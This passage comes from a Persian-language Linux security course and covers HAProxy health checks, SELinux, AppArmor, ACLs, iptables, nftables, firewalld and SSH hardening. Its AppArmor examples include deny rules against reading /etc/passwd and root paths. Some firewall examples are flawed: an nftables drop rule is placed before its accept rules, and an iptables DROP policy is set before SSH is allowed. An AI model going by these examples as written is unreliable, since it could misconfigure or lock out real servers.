۲. پیکربندی Health Checks در HAProxy

۲.۱ تنظیمات Health Check در backend

در فایل /etc/haproxy/haproxy.cfg، می‌توان Health Checks را برای بررسی وضعیت سرورها اضافه کرد.

backend web_servers_health
    balance leastconn
    option httpchk GET /health
    server web1 192.168.1.101:80 check inter 2000 rise 2 fall 3
    server web2 192.168.1.102:80 check inter 2000 rise 2 fall 3

۲.۲ توضیح پارامترهای Health Check

• option httpchk GET /health → HAProxy این درخواست را برای بررسی سلامت سرورها ارسال می‌کند.
• check → فعال کردن بررسی سلامت برای هر سرور.
• inter 2000 → بررسی سلامت هر ۲ ثانیه یک‌بار انجام می‌شود.
• rise 2 → اگر ۲ بار متوالی سرور پاسخ دهد، به عنوان سالم شناخته می‌شود.
• fall 3 → اگر ۳ بار متوالی سرور پاسخ ندهد، از سرویس خارج می‌شود.

۲.۳ راه‌اندازی مجدد HAProxy

haproxy -c -f /etc/haproxy/haproxy.cfg
systemctl restart haproxy

۲.۴ مشاهده وضعیت سرورها در HAProxy

echo "show stat" | socat stdio /var/lib/haproxy/stats

---

جمع‌بندی

• SSL Termination در HAProxy باعث کاهش بار پردازشی سرورهای backend و افزایش امنیت ارتباطات می‌شود.
• Health Checks در HAProxy سرورهای سالم و ناسالم را شناسایی کرده و از ارسال درخواست‌ها به سرورهای ناسالم جلوگیری می‌کند.
• هر دو قابلیت باعث افزایش پایداری و بهبود عملکرد سیستم می‌شوند.

[/cdb_course_lesson][/cdb_course_lessons]

[cdb_course_lessons title=”بخش 3: امنیت سیستم”][cdb_course_lesson title=”فصل 1. ابزارها و سیاست‌های امنیتی”][/cdb_course_lesson][cdb_course_lesson title=”معرفی SELinux و AppArmor”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”پیکربندی SELinux” subtitle=”توضیحات کامل”]SELinux و AppArmor دو سیستم کنترل دسترسی اجباری (MAC) هستند که برای افزایش امنیت سیستم‌های لینوکسی استفاده می‌شوند. هر دو ابزار با محدود کردن سطح دسترسی برنامه‌ها و سرویس‌ها به حداقل ممکن، از حملات جلوگیری می‌کنند.

---

مقایسه SELinux و AppArmor

ویژگی	SELinux	AppArmor
نوع کنترل	کنترل بر اساس متن (Context-Based)	کنترل بر اساس مسیر فایل (Path-Based)
پیچیدگی پیکربندی	پیچیده‌تر و انعطاف‌پذیرتر	ساده‌تر و سریع‌تر
استفاده در توزیع‌ها	RedHat, CentOS, Fedora	Ubuntu, Debian, SUSE
مدل سیاست‌ها	دارای حالت‌های اجباری (Enforcing) و هدفمند (Targeted)	سیاست‌ها به صورت پروفایل (Profiles) تعریف می‌شوند
مدیریت خطاها	خطاهای دقیق‌تری در لاگ‌ها ارائه می‌دهد	ساده‌تر و خواناتر برای کاربران عادی

هر دو ابزار امنیتی هستند، اما SELinux کنترل دقیق‌تری روی امنیت دارد، در حالی که AppArmor پیکربندی آسان‌تری ارائه می‌دهد.

---

پیکربندی SELinux

۱. بررسی وضعیت SELinux

getenforce

۲. تغییر وضعیت SELinux به حالت‌های مختلف

• Enforcing (اجرای سخت‌گیرانه)
• Permissive (ثبت خطاها بدون جلوگیری از دسترسی)
• Disabled (غیرفعال کردن SELinux)

setenforce 0    # تغییر به Permissive
setenforce 1    # تغییر به Enforcing

برای دائمی کردن این تغییر، فایل /etc/selinux/config را ویرایش کنید:

nano /etc/selinux/config

و مقدار SELINUX را تغییر دهید:

SELINUX=enforcing   # برای اجرای سخت‌گیرانه
SELINUX=permissive  # فقط ثبت خطاها
SELINUX=disabled    # غیرفعال کردن SELinux

۳. بررسی لاگ‌های SELinux

برای مشاهده پیام‌های مرتبط با SELinux، از journalctl یا auditd استفاده کنید:

journalctl -xe | grep -i selinux

یا اگر auditd نصب است:

ausearch -m avc

۴. ایجاد قوانین جدید در SELinux

فرض کنید که یک سرویس نیاز به دسترسی خاصی دارد اما SELinux مانع آن شده است. می‌توان با استفاده از audit2allow یک قانون جدید ایجاد کرد.

۱. نصب ابزارهای لازم:

yum install policycoreutils-python-utils -y  # در RHEL/CentOS
apt install policycoreutils -y               # در Debian/Ubuntu

۲. بررسی لاگ‌های SELinux و ایجاد قانون جدید:

ausearch -m avc -c "httpd" | audit2allow -M httpd_custom
semodule -i httpd_custom.pp

۵. مدیریت کانتکست‌های SELinux

برای مشاهده کانتکست‌های امنیتی فایل‌ها:

ls -Z /var/www/html/

برای تغییر کانتکست فایل:

chcon -t httpd_sys_content_t /var/www/html/index.html

---

جمع‌بندی

• SELinux و AppArmor دو مکانیسم امنیتی قوی هستند که از نفوذ و حملات جلوگیری می‌کنند.
• SELinux سخت‌گیرانه‌تر و کنترل‌محور است، در حالی که AppArmor ساده‌تر و سریع‌تر پیکربندی می‌شود.
• برای مدیریت SELinux باید بتوانید وضعیت آن را بررسی کرده، خطاهای آن را تحلیل کنید و در صورت نیاز قوانین جدیدی اضافه نمایید.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”روش‌های کاربردی و مدیریت دسترسی” subtitle=”توضیحات کامل”]مدیریت دسترسی در لینوکس یکی از مهم‌ترین بخش‌های امنیت سیستم است که شامل مجوزهای فایل، گروه‌ها، ACLها، و مکانیزم‌های امنیتی پیشرفته مانند SELinux و AppArmor می‌شود. در این بخش، روش‌های اصلی مدیریت دسترسی را بررسی می‌کنیم.

---

مدیریت دسترسی با مجوزهای فایل در لینوکس

۱. بررسی سطح دسترسی فایل‌ها و دایرکتوری‌ها

برای مشاهده سطح دسترسی یک فایل یا دایرکتوری، از دستور زیر استفاده کنید:

ls -l /path/to/file_or_directory

نمونه خروجی:

-rw-r--r-- 1 root root 4096 Feb 25 10:30 example.txt

• rw- → صاحب فایل (Owner): خواندن و نوشتن
• r-- → گروه (Group): فقط خواندن
• r-- → دیگران (Others): فقط خواندن

۲. تغییر سطح دسترسی با chmod

۱. تنظیم مجوزهای فایل با روش نمادی (Symbolic):

chmod u+rwx,g+r,o-rwx example.txt

• u → کاربر (Owner)
• g → گروه (Group)
• o → دیگران (Others)
• + → اضافه کردن دسترسی
• - → حذف دسترسی

۲. تنظیم مجوزهای فایل با روش عددی (Octal):

chmod 755 example.txt

• 7 → (rwx) خواندن، نوشتن، اجرا (صاحب فایل)
• 5 → (r-x) خواندن، اجرا (گروه)
• 5 → (r-x) خواندن، اجرا (دیگران)

۳. تغییر مالکیت و گروه فایل با chown و chgrp

۱. تغییر مالکیت فایل:

chown user1 example.txt

۲. تغییر گروه فایل:

chgrp group1 example.txt

۳. تغییر هم‌زمان مالکیت و گروه:

chown user1:group1 example.txt

---

مدیریت دسترسی با ACL (Access Control List)

ACL‌ها به شما اجازه می‌دهند که سطوح دسترسی دقیق‌تری برای کاربران و گروه‌ها تعیین کنید.

۱. بررسی ACL‌های یک فایل

getfacl example.txt

۲. اضافه کردن دسترسی برای کاربر خاص

setfacl -m u:user2:rwx example.txt

۳. حذف دسترسی یک کاربر از فایل

setfacl -x u:user2 example.txt

۴. اضافه کردن دسترسی برای یک گروه

setfacl -m g:developers:rx example.txt

۵. تنظیم ACL پیش‌فرض برای دایرکتوری

setfacl -d -m u:user3:rwx /home/shared

---

مدیریت دسترسی پیشرفته با SELinux

در سیستم‌هایی که SELinux فعال است، باید کانتکست امنیتی فایل‌ها نیز تنظیم شود.

۱. بررسی کانتکست امنیتی فایل‌ها

ls -Z /var/www/html/index.html

۲. تغییر کانتکست امنیتی فایل‌ها

chcon -t httpd_sys_content_t /var/www/html/index.html

۳. تنظیم دائمی کانتکست امنیتی فایل

semanage fcontext -a -t httpd_sys_content_t "/var/www/html(/.*)?"
restorecon -Rv /var/www/html

---

مدیریت دسترسی در AppArmor

اگر سیستم شما از AppArmor استفاده می‌کند، باید پروفایل‌های امنیتی برای برنامه‌ها تعریف شود.

۱. بررسی وضعیت AppArmor

aa-status

۲. ایجاد یک پروفایل جدید برای برنامه

aa-genprof /usr/bin/nginx

۳. اعمال تغییرات و فعال‌سازی پروفایل

apparmor_parser -r /etc/apparmor.d/usr.bin.nginx

---

جمع‌بندی

• مجوزهای سنتی فایل (chmod, chown, chgrp) روش پایه‌ای مدیریت دسترسی در لینوکس است.
• ACLها (Access Control List) دسترسی‌های پیشرفته‌تری را برای کاربران و گروه‌ها فراهم می‌کنند.
• SELinux و AppArmor برای کنترل پیشرفته‌تر سطح دسترسی برنامه‌ها و فایل‌ها استفاده می‌شوند.
• مدیریت صحیح مجوزها و امنیت فایل‌ها در لینوکس از مهم‌ترین روش‌های حفاظت از داده‌ها در سرورهای لینوکسی است.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”تنظیمات AppArmor برای افزایش امنیت” subtitle=”توضیحات کامل”]AppArmor یک سیستم کنترل دسترسی اجباری (Mandatory Access Control – MAC) است که به شما امکان می‌دهد دسترسی برنامه‌ها و سرویس‌ها به منابع سیستم را محدود کنید. این ابزار به‌صورت پیش‌فرض در Ubuntu و برخی دیگر از توزیع‌های لینوکس فعال است.

در این بخش، مفاهیم اساسی AppArmor، نحوه پیکربندی، ایجاد پروفایل‌های امنیتی و نحوه مدیریت آن را بررسی می‌کنیم.

---

۱. بررسی وضعیت AppArmor

برای بررسی اینکه آیا AppArmor در سیستم فعال است یا خیر، از دستور زیر استفاده کنید:

aa-status

خروجی این دستور وضعیت پروفایل‌های بارگذاری‌شده، پروفایل‌های در حال اجرا و برنامه‌هایی که توسط AppArmor محافظت می‌شوند را نمایش می‌دهد.

---

۲. نصب و فعال‌سازی AppArmor

نصب AppArmor (در صورتی که نصب نیست)

apt install apparmor apparmor-utils -y   # برای Debian/Ubuntu

فعال‌سازی سرویس AppArmor

systemctl enable --now apparmor

بررسی وضعیت سرویس

systemctl status apparmor

---

۳. نحوه مدیریت پروفایل‌های AppArmor

پروفایل‌های AppArmor دسترسی برنامه‌ها را به فایل‌ها، شبکه و سایر منابع سیستم محدود یا مجاز می‌کنند. این پروفایل‌ها در مسیر /etc/apparmor.d/ قرار دارند.

فهرست پروفایل‌های فعال

ls /etc/apparmor.d/

بارگذاری مجدد تمام پروفایل‌ها

systemctl restart apparmor

اجرای AppArmor در حالت Enforce (اجرای قوانین امنیتی)

aa-enforce /etc/apparmor.d/usr.sbin.nginx

اجرای AppArmor در حالت Complain (فقط ثبت هشدار بدون مسدودسازی)

aa-complain /etc/apparmor.d/usr.sbin.nginx

---

۴. ایجاد و ویرایش پروفایل امنیتی برای یک برنامه

ایجاد پروفایل جدید برای یک برنامه (مثلاً Nginx)

aa-genprof /usr/sbin/nginx

پس از اجرای دستور فوق، AppArmor برنامه nginx را مانیتور کرده و در طول اجرای آن، قوانینی را برای دسترسی‌های مورد نیاز ایجاد می‌کند. پس از اتمام، می‌توان پروفایل را ذخیره و فعال کرد.

ویرایش یک پروفایل موجود

nano /etc/apparmor.d/usr.sbin.nginx

مثال: محدود کردن دسترسی Nginx فقط به /var/www/

#include <tunables/global>
/usr/sbin/nginx {
    # دسترسی خواندن و نوشتن به /var/www/
    /var/www/** r,
    /var/www/** w,
    # مسدود کردن دسترسی به دیگر مسیرها
    deny /etc/** r,
    deny /root/** rw,
}

بارگذاری مجدد پروفایل بعد از تغییرات

apparmor_parser -r /etc/apparmor.d/usr.sbin.nginx

---

۵. حذف یا غیرفعال‌سازی یک پروفایل AppArmor

غیرفعال کردن موقت یک پروفایل

aa-disable /etc/apparmor.d/usr.sbin.nginx

حذف کامل پروفایل یک برنامه

rm /etc/apparmor.d/usr.sbin.nginx

بارگذاری مجدد سرویس AppArmor پس از حذف پروفایل

systemctl restart apparmor

---

۶. نظارت بر AppArmor و ثبت لاگ‌ها

مشاهده لاگ‌های AppArmor در dmesg

dmesg | grep apparmor

مشاهده گزارش‌های مربوط به تخلفات دسترسی

journalctl -xe | grep "apparmor"

مشاهده لاگ‌های خاص از /var/log/syslog

tail -f /var/log/syslog | grep "apparmor"

---

۷. مثال عملی: محدود کردن دسترسی یک برنامه (مثلاً MySQL)

ویرایش پروفایل MySQL

nano /etc/apparmor.d/usr.sbin.mysqld

افزودن محدودیت‌ها

/usr/sbin/mysqld {
    # اجازه خواندن و نوشتن فقط به دایرکتوری‌های مشخص‌شده
    /var/lib/mysql/** rwk,
    /var/log/mysql.log rw,
    /etc/mysql/my.cnf r,
    
    # مسدود کردن دسترسی به مسیرهای حساس
    deny /home/** rw,
    deny /root/** rw,
    deny /etc/passwd r,
}

بارگذاری مجدد پروفایل برای اعمال تغییرات

apparmor_parser -r /etc/apparmor.d/usr.sbin.mysqld

---

جمع‌بندی

• AppArmor یک لایه امنیتی برای محدود کردن دسترسی برنامه‌ها و جلوگیری از سوءاستفاده‌های امنیتی ایجاد می‌کند.
• با استفاده از پروفایل‌های امنیتی می‌توان مشخص کرد که یک برنامه به چه مسیرهایی اجازه دسترسی دارد.
• پروفایل‌ها را می‌توان در دو حالت Enforce و Complain اجرا کرد.
• نظارت بر لاگ‌های AppArmor برای شناسایی تخلفات امنیتی و اصلاح پروفایل‌ها ضروری است.
• برای افزایش امنیت، دسترسی برنامه‌ها به مسیرهای غیرضروری را محدود کنید.

اجرای صحیح این تنظیمات باعث افزایش امنیت سیستم و کاهش خطر نفوذ از طریق برنامه‌های مخرب خواهد شد.[/cdb_course_lesson][cdb_course_lesson title=”فایروال پیشرفته”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”تنظیمات iptables برای فیلتر کردن ترافیک” subtitle=”توضیحات کامل”]iptables یک فایروال قدرتمند در لینوکس است که امکان کنترل و فیلتر کردن ترافیک ورودی و خروجی را فراهم می‌کند. این ابزار با استفاده از زنجیره‌ها (Chains) و قوانین (Rules)، بسته‌های شبکه‌ای را مدیریت می‌کند. در این بخش، تنظیمات کامل iptables برای کنترل ترافیک را بررسی می‌کنیم.

---

بررسی وضعیت iptables

۱. نمایش لیست قوانین فعال

iptables -L -v -n

توضیحات:

• -L نمایش لیست قوانین
• -v نمایش جزئیات بیشتر
• -n نمایش آدرس‌ها و پورت‌ها به‌صورت عددی

---

ساختار اصلی iptables

iptables شامل سه زنجیره اصلی است:

• INPUT: کنترل ترافیک ورودی
• OUTPUT: کنترل ترافیک خروجی
• FORWARD: کنترل ترافیک عبوری (در سرورهای NAT و مسیریاب‌ها)

---

مدیریت ترافیک ورودی (INPUT Chain)

۲. مسدود کردن همه ترافیک ورودی به‌جز ترافیک مجاز

iptables -P INPUT DROP

۳. اجازه دادن به ترافیک ورودی از یک IP خاص

iptables -A INPUT -s 192.168.1.100 -j ACCEPT

۴. اجازه دادن به ارتباطات مرتبط (Established & Related)

iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

۵. اجازه دادن به اتصال SSH از یک محدوده IP خاص

iptables -A INPUT -p tcp --dport 22 -s 192.168.1.0/24 -j ACCEPT

۶. مسدود کردن ترافیک ICMP (پینگ)

iptables -A INPUT -p icmp -j DROP

۷. مسدود کردن دسترسی به یک پورت خاص (مثلاً پورت 8080)

iptables -A INPUT -p tcp --dport 8080 -j DROP

---

مدیریت ترافیک خروجی (OUTPUT Chain)

۸. اجازه دادن به همه ترافیک خروجی (مگر اینکه قوانین دیگری تنظیم شوند)

iptables -P OUTPUT ACCEPT

۹. مسدود کردن همه ترافیک خروجی به یک IP خاص

iptables -A OUTPUT -d 203.0.113.5 -j DROP

---

مدیریت ترافیک Forward (FORWARD Chain)

۱۰. اجازه دادن به عبور ترافیک بین دو شبکه داخلی

iptables -A FORWARD -s 192.168.1.0/24 -d 192.168.2.0/24 -j ACCEPT

۱۱. مسدود کردن فورواردینگ تمامی ترافیک

iptables -P FORWARD DROP

---

ایجاد قوانین NAT و Port Forwarding

۱۲. فعال‌سازی NAT برای شبکه داخلی

iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

۱۳. ریدایرکت کردن ترافیک ورودی به یک سرور داخلی (Port Forwarding)

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.10:80

---

مدیریت و ذخیره قوانین iptables

۱۴. حذف همه قوانین موجود

iptables -F

۱۵. ذخیره تنظیمات برای ماندگاری بعد از ریستارت

در Ubuntu/Debian:

iptables-save > /etc/iptables.rules

در CentOS/RHEL:

service iptables save

۱۶. بارگذاری مجدد قوانین از فایل ذخیره‌شده

iptables-restore < /etc/iptables.rules

---

جمع‌بندی

• iptables ابزاری قدرتمند برای فیلتر کردن ترافیک در لینوکس است.
• می‌توان ترافیک ورودی، خروجی و عبوری را مدیریت کرد.
• قابلیت NAT و Port Forwarding به سرور اجازه می‌دهد که درخواست‌ها را به دستگاه‌های دیگر هدایت کند.
• ذخیره و بازیابی تنظیمات باعث ماندگاری تغییرات بعد از ری‌استارت سرور می‌شود.

 [/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”استفاده از nftables برای تنظیم قوانین جدید” subtitle=”توضیحات کامل”]nftables جایگزین مدرن و پیشرفته iptables برای مدیریت فایروال در لینوکس است که امکانات بهتری برای مدیریت قوانین فیلتر ترافیک، NAT، و کنترل بسته‌های شبکه‌ای فراهم می‌کند. این ابزار انعطاف‌پذیری بیشتری نسبت به iptables دارد و از یکپارچه‌سازی جداول و بهینه‌سازی خودکار بهره می‌برد.

در این بخش، نحوه نصب، پیکربندی و مدیریت قوانین با استفاده از nftables را به‌صورت گام‌به‌گام و همراه با مثال‌های عملی بررسی می‌کنیم.

---

نصب و فعال‌سازی nftables

۱. بررسی وضعیت nftables

systemctl status nftables

۲. نصب nftables (در صورت نیاز)

در Ubuntu/Debian:

apt update
apt install nftables -y

در CentOS/RHEL:

yum install nftables -y

۳. فعال‌سازی و راه‌اندازی nftables

systemctl enable --now nftables

---

ساختار nftables

در nftables از ساختار زیر برای مدیریت قوانین استفاده می‌شود:

• Table (جدول): مجموعه‌ای از زنجیره‌ها
• Chain (زنجیره): شامل مجموعه‌ای از قوانین
• Rule (قانون): دستورالعملی برای مدیریت بسته‌های شبکه

انواع جداول:

• filter: برای کنترل دسترسی و فیلتر کردن بسته‌ها
• nat: برای انجام عملیات NAT
• mangle: برای تغییر بسته‌های شبکه

---

ایجاد قوانین اولیه در nftables

۴. ایجاد جدول جدید

nft add table inet my_firewall

۵. ایجاد زنجیره‌های مورد نیاز

nft add chain inet my_firewall input { type filter hook input priority 0 \; }
nft add chain inet my_firewall output { type filter hook output priority 0 \; }
nft add chain inet my_firewall forward { type filter hook forward priority 0 \; }

---

مدیریت ترافیک ورودی (INPUT Chain)

۶. مسدود کردن همه ترافیک ورودی به جز ترافیک مجاز

nft add rule inet my_firewall input drop

۷. اجازه دادن به ترافیک SSH از یک محدوده خاص

nft add rule inet my_firewall input ip saddr 192.168.1.0/24 tcp dport 22 accept

۸. اجازه دادن به ارتباطات مرتبط (Established & Related)

nft add rule inet my_firewall input ct state established,related accept

۹. مسدود کردن درخواست‌های ICMP (پینگ)

nft add rule inet my_firewall input ip protocol icmp drop

---

مدیریت ترافیک خروجی (OUTPUT Chain)

۱۰. اجازه دادن به همه ترافیک خروجی

nft add rule inet my_firewall output accept

۱۱. مسدود کردن خروجی به یک IP خاص

nft add rule inet my_firewall output ip daddr 203.0.113.5 drop

---

مدیریت ترافیک عبوری (FORWARD Chain)

۱۲. مسدود کردن تمامی ترافیک فوروارد شده

nft add rule inet my_firewall forward drop

۱۳. اجازه دادن به ترافیک بین دو شبکه داخلی

nft add rule inet my_firewall forward ip saddr 192.168.1.0/24 ip daddr 192.168.2.0/24 accept

---

ایجاد قوانین NAT و Port Forwarding

۱۴. فعال‌سازی NAT برای شبکه داخلی

nft add table ip nat
nft add chain ip nat postrouting { type nat hook postrouting priority 100 \; }
nft add rule ip nat postrouting oifname "eth0" masquerade

۱۵. ریدایرکت کردن ترافیک ورودی به یک سرور داخلی (Port Forwarding)

nft add table ip nat
nft add chain ip nat prerouting { type nat hook prerouting priority 0 \; }
nft add rule ip nat prerouting tcp dport 80 dnat to 192.168.1.10:80

---

مدیریت و ذخیره تنظیمات nftables

۱۶. نمایش قوانین فعال

nft list ruleset

۱۷. ذخیره قوانین به فایل تنظیمات

nft list ruleset > /etc/nftables.conf

۱۸. بارگذاری مجدد قوانین از فایل تنظیمات

nft -f /etc/nftables.conf

۱۹. حذف یک قانون خاص

nft delete rule inet my_firewall input handle 3

۲۰. حذف کل جدول و قوانین آن

nft delete table inet my_firewall

---

جمع‌بندی

• nftables جایگزین بهینه iptables بوده و امکانات مدرنی برای مدیریت فایروال ارائه می‌دهد.
• ساختار Table, Chain, Rule در nftables باعث افزایش کارایی و سادگی مدیریت قوانین شده است.
• می‌توان قوانین مختلفی برای مدیریت ترافیک ورودی، خروجی و عبوری تنظیم کرد.
• NAT و Port Forwarding به سادگی با استفاده از nftables انجام می‌شود.
• امکان ذخیره و بارگذاری قوانین باعث پایداری تنظیمات حتی پس از راه‌اندازی مجدد سیستم می‌شود.

[/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”پیکربندی firewalld برای مدیریت دینامیک قوانین” subtitle=”توضیحات کامل”]firewalld یک فایروال پویا و قدرتمند در سیستم‌های لینوکسی است که جایگزین iptables شده و امکانات پیشرفته‌ای برای مدیریت قوانین امنیتی و فیلتر کردن ترافیک فراهم می‌کند. این ابزار از مناطق امنیتی (Zones) و سرویس‌ها (Services) برای تنظیم سیاست‌های امنیتی استفاده می‌کند و می‌توان آن را بدون نیاز به راه‌اندازی مجدد، به‌صورت دینامیک تغییر داد.

در این بخش، نحوه نصب، پیکربندی و مدیریت firewalld همراه با مثال‌های کاربردی و عملی ارائه می‌شود.

---

نصب و فعال‌سازی firewalld

۱. بررسی وضعیت firewalld

systemctl status firewalld

۲. نصب firewalld (در صورت نیاز)

در Ubuntu/Debian:

apt update
apt install firewalld -y

در CentOS/RHEL:

yum install firewalld -y

۳. فعال‌سازی و راه‌اندازی firewalld

systemctl enable --now firewalld

۴. بررسی نسخه firewalld

firewalld --version

---

ساختار firewalld و مناطق امنیتی (Zones)

در firewalld، ترافیک شبکه‌ای بر اساس مناطق امنیتی (Zones) کنترل می‌شود. برخی از مهم‌ترین مناطق به شرح زیر هستند:

• public: برای اتصال به اینترنت با محدودیت‌های متوسط
• internal: برای شبکه‌های داخلی با سطح دسترسی بالا
• trusted: برای شبکه‌های کاملاً امن
• drop: همه بسته‌ها را مسدود می‌کند
• block: همه بسته‌ها را رد می‌کند و پاسخ ICMP unreachable ارسال می‌کند
• work: مناسب برای شبکه‌های کاری

۵. مشاهده مناطق موجود و منطقه فعال

firewall-cmd --get-zones
firewall-cmd --get-default-zone

۶. تغییر منطقه پیش‌فرض

firewall-cmd --set-default-zone=public

---

مدیریت سرویس‌ها و پورت‌ها در firewalld

۷. مشاهده سرویس‌های مجاز در منطقه فعال

firewall-cmd --list-services

۸. اضافه کردن سرویس به منطقه فعال

firewall-cmd --add-service=http --permanent
firewall-cmd --add-service=https --permanent

۹. حذف یک سرویس از firewalld

firewall-cmd --remove-service=http --permanent

۱۰. مشاهده پورت‌های باز در منطقه فعال

firewall-cmd --list-ports

۱۱. اضافه کردن پورت به firewalld

firewall-cmd --add-port=8080/tcp --permanent

۱۲. حذف پورت از firewalld

firewall-cmd --remove-port=8080/tcp --permanent

---

مدیریت قوانین در firewalld

۱۳. مشاهده تمام قوانین اعمال‌شده در firewalld

firewall-cmd --list-all

۱۴. اعمال تغییرات بدون نیاز به راه‌اندازی مجدد

firewall-cmd --reload

۱۵. اضافه کردن یک IP خاص به لیست مسدودشده

firewall-cmd --add-rich-rule='rule family="ipv4" source address="203.0.113.5" drop' --permanent

۱۶. حذف یک IP از لیست مسدودشده

firewall-cmd --remove-rich-rule='rule family="ipv4" source address="203.0.113.5" drop' --permanent

---

مدیریت NAT و Port Forwarding

۱۷. فعال‌سازی NAT برای یک شبکه خاص

firewall-cmd --add-masquerade --permanent

۱۸. تنظیم Port Forwarding برای هدایت پورت 80 به 8080

firewall-cmd --add-forward-port=port=80:proto=tcp:toport=8080 --permanent

۱۹. مشاهده وضعیت NAT و Port Forwarding

firewall-cmd --query-masquerade

---

مدیریت دسترسی و محدود کردن ترافیک

۲۰. محدود کردن دسترسی به SSH فقط از یک IP خاص

firewall-cmd --add-rich-rule='rule family="ipv4" source address="192.168.1.100" service name="ssh" accept' --permanent

۲۱. محدود کردن درخواست‌های ICMP (پینگ)

firewall-cmd --add-icmp-block=echo-request --permanent

۲۲. حذف مسدودسازی ICMP

firewall-cmd --remove-icmp-block=echo-request --permanent

---

ذخیره و بارگذاری تنظیمات firewalld

۲۳. ذخیره تنظیمات و اطمینان از اعمال دائمی تغییرات

firewall-cmd --runtime-to-permanent

۲۴. راه‌اندازی مجدد firewalld برای اعمال تغییرات

systemctl restart firewalld

۲۵. ریست کردن firewalld و بازگشت به تنظیمات اولیه

firewall-cmd --complete-reload

---

جمع‌بندی

• firewalld یک مدیریت دینامیک و منعطف برای تنظیم قوانین فایروال در لینوکس ارائه می‌دهد.
• Zones (مناطق امنیتی) در firewalld به کاربران اجازه می‌دهند سیاست‌های امنیتی را بر اساس سطح اطمینان شبکه تنظیم کنند.
• می‌توان سرویس‌ها و پورت‌ها را بدون نیاز به راه‌اندازی مجدد سیستم اضافه یا حذف کرد.
• قوانین پیشرفته‌ای مانند مسدود کردن IP خاص، Port Forwarding و NAT به‌راحتی قابل انجام هستند.
• با قابلیت‌های rich rules می‌توان قوانین پیچیده‌ای برای کنترل دسترسی‌ها و فیلترینگ اعمال کرد.
• ذخیره و بارگذاری تنظیمات باعث می‌شود تغییرات حتی بعد از ری‌استارت سیستم باقی بمانند.

[/cdb_course_lesson][cdb_course_lesson title=”امنیت SSH”][/cdb_course_lesson][cdb_course_lesson icon=”fas fa-arrow-alt-circle-down” badge=”lecture” private_lesson=”true” title=”تنظیمات امنیتی SSH (Disable Root Login, Strong Passwords)” subtitle=”توضیحات کامل”]SSH یکی از مهم‌ترین راه‌های دسترسی به سرورها است، اما به دلیل اهمیت آن، امنیت این سرویس باید به‌درستی تنظیم شود تا از حملات Brute Force، دسترسی غیرمجاز و سوءاستفاده از دسترسی ریشه (root) جلوگیری شود.

در این بخش، به تنظیمات امنیتی SSH برای افزایش امنیت اتصالات راه دور پرداخته می‌شود. این تنظیمات شامل موارد زیر خواهد بود:

• غیرفعال‌سازی ورود کاربر root
• الزام استفاده از رمزهای عبور قوی
• محدود کردن کاربران مجاز
• محدود کردن تعداد تلاش‌های ناموفق ورود
• فعال‌سازی احراز هویت کلیدی (Key-based authentication)
• تغییر پورت پیش‌فرض SSH
• پیکربندی Fail2Ban برای جلوگیری از حملات Brute Force

---

۱. غیرفعال‌سازی ورود کاربر root

به‌صورت پیش‌فرض، امکان ورود مستقیم به سیستم با کاربر root وجود دارد، اما این کار امنیت سیستم را به‌شدت کاهش می‌دهد. برای جلوگیری از این موضوع، باید ورود مستقیم root را در تنظیمات SSH غیرفعال کرد.

ویرایش فایل تنظیمات SSH

مسیر فایل: /etc/ssh/sshd_config

nano /etc/ssh/sshd_config

پیدا کردن و تغییر مقدار زیر:

PermitRootLogin no

بارگذاری مجدد سرویس SSH برای اعمال تغییرات

systemctl restart sshd

---

۲. الزام به استفاده از رمزهای عبور قوی

برای افزایش امنیت، باید از رمزهای عبور قوی استفاده کرد. در سیستم‌های لینوکسی می‌توان حداقل طول رمز عبور و پیچیدگی آن را تنظیم کرد.

ویرایش فایل تنظیمات PAM

مسیر فایل: /etc/security/pwquality.conf

nano /etc/security/pwquality.conf

افزودن تنظیمات زیر برای سخت‌گیری در رمزهای عبور

minlen = 12
dcredit = -1
ucredit = -1
ocredit = -1
lcredit = -1

• minlen = 12 → حداقل طول رمز ۱۲ کاراکتر
• dcredit = -1 → حداقل یک عدد
• ucredit = -1 → حداقل یک حرف بزرگ
• ocredit = -1 → حداقل یک کاراکتر خاص
• lcredit = -1 → حداقل یک حرف کوچک

---

۳. محدود کردن کاربران مجاز برای ورود از طریق SSH

برای افزایش امنیت، باید فقط کاربران مشخصی اجازه ورود به سرور از طریق SSH را داشته باشند.

ویرایش فایل تنظیمات SSH

nano /etc/ssh/sshd_config

افزودن کاربران مجاز (به‌جای user1 و user2 نام کاربران واقعی را قرار دهید)

AllowUsers user1 user2

بارگذاری مجدد سرویس SSH

systemctl restart sshd

---

۴. محدود کردن تعداد تلاش‌های ناموفق ورود

برای جلوگیری از حملات Brute Force می‌توان تعداد تلاش‌های ناموفق ورود را محدود کرد.

ویرایش فایل تنظیمات SSH

nano /etc/ssh/sshd_config

افزودن مقدار زیر برای محدود کردن تعداد ورودهای ناموفق

MaxAuthTries 3

بارگذاری مجدد سرویس SSH

systemctl restart sshd

---

۵. فعال‌سازی احراز هویت کلیدی (Key-based authentication)

یکی از روش‌های بسیار امن برای ورود به SSH استفاده از کلیدهای عمومی و خصوصی است.

ایجاد کلید در سیستم کلاینت (لپ‌تاپ شخصی)

ssh-keygen -t rsa -b 4096

کپی کردن کلید به سرور

ssh-copy-id user@server-ip

غیرفعال کردن ورود با رمز عبور (پس از اطمینان از عملکرد کلیدها)

ویرایش فایل /etc/ssh/sshd_config و تغییر مقدار زیر:

PasswordAuthentication no

بارگذاری مجدد سرویس SSH

systemctl restart sshd

---

۶. تغییر پورت پیش‌فرض SSH

به‌صورت پیش‌فرض، SSH از پورت ۲۲ استفاده می‌کند که در بسیاری از حملات مورد هدف قرار می‌گیرد. تغییر پورت پیش‌فرض باعث کاهش تلاش‌های غیرمجاز برای ورود می‌شود.

ویرایش فایل تنظیمات SSH

nano /etc/ssh/sshd_config

